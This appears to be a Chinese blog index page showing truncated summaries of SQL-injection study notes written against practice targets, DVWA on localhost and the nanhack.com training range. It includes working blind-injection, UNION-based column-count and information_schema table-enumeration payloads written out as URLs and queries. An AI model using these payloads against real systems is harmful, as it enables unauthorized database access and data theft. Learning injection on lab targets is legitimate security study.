摘要：盲注 猜数据库长度 http://127.0.0.1/dvwa/vulnerabilities/sqli_blind/?id=3' and LENGTH(DATABASE())=4 --+&Submit=Submit# User ID exists in the database. 得出databa 阅读全文

摘要：#查询表名-去重查询 #TABLE_NAME #users #guestbook SELECT DISTINCT TABLE_NAME FROM COLUMNS WHERE TABLE_SCHEMA = 'dvwa' ; #查询表名-分组 #group_concat(distinct TABLE_N 阅读全文

摘要：字符型SQL注入笔记-男黑客靶场 男黑客靶场：http://www.nanhack.com 猜测列数 输入如下能得到结果 http://www.nanhack.com/payload/sql/char.php?id=-2' UNION SELECT 1,2,3,4,5,6,7,8--+ 输入如下无法 阅读全文

摘要：数字型 特点：不需要单引号闭合 例如数字型语句：select * from table where id =2 1-添加单引号 正常 http://www.nanhack.com/payload/sql/number.php?id=2 异常 http://www.nanhack.com/payloa 阅读全文